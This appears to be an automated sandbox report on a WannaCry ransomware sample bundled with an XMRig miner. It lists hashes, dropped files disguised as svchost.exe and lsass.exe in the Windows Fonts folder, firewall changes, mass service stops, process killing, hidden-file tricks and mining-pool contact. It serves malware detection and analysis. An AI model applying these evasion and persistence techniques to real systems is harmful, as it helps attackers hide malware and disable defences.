wannacry | 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a

Analysis

max time kernel
203s
max time network
210s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
08-07-2022 01:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
Size

2.3MB
MD5

7b4f33a283fc64db1227f5d82db91a59
SHA1

f32ae945c419e09e3320686f2b9b419c346d76a3
SHA256

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a
SHA512

7c59bc1028115acbda27245a8f14638892a3fbae1ac409ec62448f9ad580fd3051bdaef751b7d8f6e81df80a23098201de386082e229a768a6142a514ee85511

Score

10^/10

wannacry xmrig evasion miner ransomware upx worm

Malware Config

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Detected Stratum cryptominer command 2 IoCs
Looks to be attempting to contact Stratum mining pool.
miner

Processes:

svchost.exeKvMonXP.exe

pid process

5092 svchost.exe
3540 KvMonXP.exe

pid	process
5092	svchost.exe
3540	KvMonXP.exe

XMRig Miner payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4288-130-0x0000000000400000-0x0000000000656000-memory.dmp	xmrig
C:\Windows\Fonts\lsass.exe	xmrig
\??\c:\windows\Fonts\lsass.exe	xmrig
C:\Windows\Fonts\KvMonXP.exe	xmrig
\??\c:\windows\Fonts\KvMonXP.exe	xmrig

Executes dropped EXE 12 IoCs

Processes:

svchost.exesvchost.exesvchost.exesvchost.exesvchost.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeKvMonXP.exe

pid	process
1824	svchost.exe
1732	svchost.exe
2444	svchost.exe
2088	svchost.exe
4120	svchost.exe
3296	lsass.exe
5092	svchost.exe
3684	svchost.exe
1844	svchost.exe
3104	svchost.exe
1132	svchost.exe
3540	KvMonXP.exe

Modifies Windows Firewall 1 TTPs 4 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

3672 netsh.exe
3152 netsh.exe
3504 netsh.exe
3472 netsh.exe
Sets file to hidden 1 TTPs 7 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

4396 attrib.exe
1252 attrib.exe
2124 attrib.exe
4084 attrib.exe
3968 attrib.exe
4324 attrib.exe
2752 attrib.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
3672	netsh.exe
3152	netsh.exe
3504	netsh.exe
3472	netsh.exe

pid	process
4396	attrib.exe
1252	attrib.exe
2124	attrib.exe
4084	attrib.exe
3968	attrib.exe
4324	attrib.exe
2752	attrib.exe

UPX packed file 28 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\??\c:\windows\Fonts\svchost.exe	upx
behavioral2/memory/1824-187-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1732-188-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2088-190-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2444-189-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1824-195-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1732-207-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2444-209-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/4120-210-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/5092-218-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/5092-220-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/3684-219-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/1844-222-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2088-225-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1132-226-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/3104-227-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/4120-228-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1132-229-0x0000000140000000-0x0000000140053000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe

Drops file in Windows directory 64 IoCs

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\tasksche.exe	attrib.exe
File opened for modification	C:\windows\debug\services.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\hosts.bat	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\svchost.exe	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
File opened for modification	C:\Windows\svchost.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	\??\c:\windows\Fonts\svchost.exe	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
4836	sc.exe
2260	sc.exe
3684	sc.exe
4216	sc.exe
744	sc.exe
2112	sc.exe
3480	sc.exe
5024	sc.exe
4716	sc.exe
3520	sc.exe
3852	sc.exe
2708	sc.exe
4624	sc.exe
3100	sc.exe
4492	sc.exe
4084	sc.exe
3132	sc.exe
2412	sc.exe
3804	sc.exe
4140	sc.exe
4680	sc.exe
4524	sc.exe
1184	sc.exe
2180	sc.exe
2428	sc.exe
4060	sc.exe
3436	sc.exe
3404	sc.exe
4168	sc.exe
5064	sc.exe
3604	sc.exe
4676	sc.exe
4512	sc.exe
4484	sc.exe
1004	sc.exe
4396	sc.exe
752	sc.exe
4800	sc.exe
4656	sc.exe
4172	sc.exe
3880	sc.exe
1484	sc.exe
4996	sc.exe
3464	sc.exe
1924	sc.exe
1980	sc.exe
2544	sc.exe
5108	sc.exe
344	sc.exe
4504	sc.exe
3776	sc.exe
2832	sc.exe
4688	sc.exe
3116	sc.exe
2524	sc.exe
2984	sc.exe
2832	sc.exe
4656	sc.exe
4892	sc.exe
3476	sc.exe
1924	sc.exe
3828	sc.exe
3940	sc.exe
1096	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with WMI 23 IoCs

evasion

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid	process
1492	WMIC.exe
4184	WMIC.exe
4656	WMIC.exe
3144	WMIC.exe
3540	WMIC.exe
460	WMIC.exe
2164	WMIC.exe
2892	WMIC.exe
4940	WMIC.exe
4252	WMIC.exe
2300	WMIC.exe
4952	WMIC.exe
4960	WMIC.exe
4608	WMIC.exe
1596	WMIC.exe
3992	WMIC.exe
4764	WMIC.exe
3636	WMIC.exe
2476	WMIC.exe
1652	WMIC.exe
4544	WMIC.exe
4228	WMIC.exe
1812	WMIC.exe

Kills process with taskkill 10 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4440	taskkill.exe
1728	taskkill.exe
1828	taskkill.exe
3036	taskkill.exe
4960	taskkill.exe
4056	taskkill.exe
1916	taskkill.exe
4980	taskkill.exe
2336	taskkill.exe
1512	taskkill.exe

Modifies registry class 1 IoCs

Processes:

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

lsass.exe

pid	process
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe
3296	lsass.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeKvMonXP.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	3144	WMIC.exe
Token: SeSecurityPrivilege	3144	WMIC.exe
Token: SeTakeOwnershipPrivilege	3144	WMIC.exe
Token: SeLoadDriverPrivilege	3144	WMIC.exe
Token: SeSystemProfilePrivilege	3144	WMIC.exe
Token: SeSystemtimePrivilege	3144	WMIC.exe
Token: SeProfSingleProcessPrivilege	3144	WMIC.exe
Token: SeIncBasePriorityPrivilege	3144	WMIC.exe
Token: SeCreatePagefilePrivilege	3144	WMIC.exe
Token: SeBackupPrivilege	3144	WMIC.exe
Token: SeRestorePrivilege	3144	WMIC.exe
Token: SeShutdownPrivilege	3144	WMIC.exe
Token: SeDebugPrivilege	3144	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3144	WMIC.exe
Token: SeRemoteShutdownPrivilege	3144	WMIC.exe
Token: SeUndockPrivilege	3144	WMIC.exe
Token: SeManageVolumePrivilege	3144	WMIC.exe
Token: 33	3144	WMIC.exe
Token: 34	3144	WMIC.exe
Token: 35	3144	WMIC.exe
Token: 36	3144	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3144	WMIC.exe
Token: SeSecurityPrivilege	3144	WMIC.exe
Token: SeTakeOwnershipPrivilege	3144	WMIC.exe
Token: SeLoadDriverPrivilege	3144	WMIC.exe
Token: SeSystemProfilePrivilege	3144	WMIC.exe
Token: SeSystemtimePrivilege	3144	WMIC.exe
Token: SeProfSingleProcessPrivilege	3144	WMIC.exe
Token: SeIncBasePriorityPrivilege	3144	WMIC.exe
Token: SeCreatePagefilePrivilege	3144	WMIC.exe
Token: SeBackupPrivilege	3144	WMIC.exe
Token: SeRestorePrivilege	3144	WMIC.exe
Token: SeShutdownPrivilege	3144	WMIC.exe
Token: SeDebugPrivilege	3144	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3144	WMIC.exe
Token: SeRemoteShutdownPrivilege	3144	WMIC.exe
Token: SeUndockPrivilege	3144	WMIC.exe
Token: SeManageVolumePrivilege	3144	WMIC.exe
Token: 33	3144	WMIC.exe
Token: 34	3144	WMIC.exe
Token: 35	3144	WMIC.exe
Token: 36	3144	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3540	KvMonXP.exe
Token: SeSecurityPrivilege	3540	KvMonXP.exe
Token: SeTakeOwnershipPrivilege	3540	KvMonXP.exe
Token: SeLoadDriverPrivilege	3540	KvMonXP.exe
Token: SeSystemProfilePrivilege	3540	KvMonXP.exe
Token: SeSystemtimePrivilege	3540	KvMonXP.exe
Token: SeProfSingleProcessPrivilege	3540	KvMonXP.exe
Token: SeIncBasePriorityPrivilege	3540	KvMonXP.exe
Token: SeCreatePagefilePrivilege	3540	KvMonXP.exe
Token: SeBackupPrivilege	3540	KvMonXP.exe
Token: SeRestorePrivilege	3540	KvMonXP.exe
Token: SeShutdownPrivilege	3540	KvMonXP.exe
Token: SeDebugPrivilege	3540	KvMonXP.exe
Token: SeSystemEnvironmentPrivilege	3540	KvMonXP.exe
Token: SeRemoteShutdownPrivilege	3540	KvMonXP.exe
Token: SeUndockPrivilege	3540	KvMonXP.exe
Token: SeManageVolumePrivilege	3540	KvMonXP.exe
Token: 33	3540	KvMonXP.exe
Token: 34	3540	KvMonXP.exe
Token: 35	3540	KvMonXP.exe
Token: 36	3540	KvMonXP.exe
Token: SeIncreaseQuotaPrivilege	3540	KvMonXP.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exelsass.exe

pid	process
4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
3296	lsass.exe
3296	lsass.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.execmd.exe

description	pid	process	target process
PID 4288 wrote to memory of 4232	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	cmd.exe
PID 4288 wrote to memory of 4232	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	cmd.exe
PID 4288 wrote to memory of 4232	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	cmd.exe
PID 4288 wrote to memory of 4244	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4244	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4244	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4168	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4168	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4168	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4504	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4504	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4504	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4860	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4860	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4860	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4524	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4524	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4524	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 1512	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 1512	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 1512	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 2156	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 2156	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 2156	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 1492	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 1492	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 1492	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4680	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4680	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4680	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 2476	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 2476	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 2476	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 5064	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 5064	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 5064	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4764	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4764	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4764	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4512	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4512	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4512	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 3024	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 3024	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 3024	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4656	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4656	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4656	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 4236	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4236	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 4236	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 3636	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 3636	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 3636	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 1812	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 1812	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 1812	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 3476	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 3476	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 3476	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 4288 wrote to memory of 3388	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 3388	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4288 wrote to memory of 3388	4288	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 4232 wrote to memory of 2700	4232	cmd.exe	attrib.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
2568	attrib.exe
2360	attrib.exe
2548	attrib.exe
3444	attrib.exe
3472	attrib.exe
2868	attrib.exe
2948	attrib.exe
3616	attrib.exe
4140	attrib.exe
4164	attrib.exe
3692	attrib.exe
680	attrib.exe
2716	attrib.exe
220	attrib.exe
3912	attrib.exe
4628	attrib.exe
1540	attrib.exe
2744	attrib.exe
652	attrib.exe
2788	attrib.exe
3188	attrib.exe
3144	attrib.exe
4184	attrib.exe
3476	attrib.exe
4160	attrib.exe
4212	attrib.exe
4492	attrib.exe
3952	attrib.exe
4324	attrib.exe
2124	attrib.exe
4084	attrib.exe
1176	attrib.exe
4844	attrib.exe
3544	attrib.exe
3652	attrib.exe
4172	attrib.exe
4000	attrib.exe
2964	attrib.exe
3248	attrib.exe
216	attrib.exe
4264	attrib.exe
2232	attrib.exe
3756	attrib.exe
4600	attrib.exe
4212	attrib.exe
1536	attrib.exe
4800	attrib.exe
4660	attrib.exe
4164	attrib.exe
3952	attrib.exe
2076	attrib.exe
2752	attrib.exe
4108	attrib.exe
2348	attrib.exe
2248	attrib.exe
4020	attrib.exe
3556	attrib.exe
1252	attrib.exe
4216	attrib.exe
2304	attrib.exe
3696	attrib.exe
2656	attrib.exe
3192	attrib.exe
1300	attrib.exe

C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
"C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
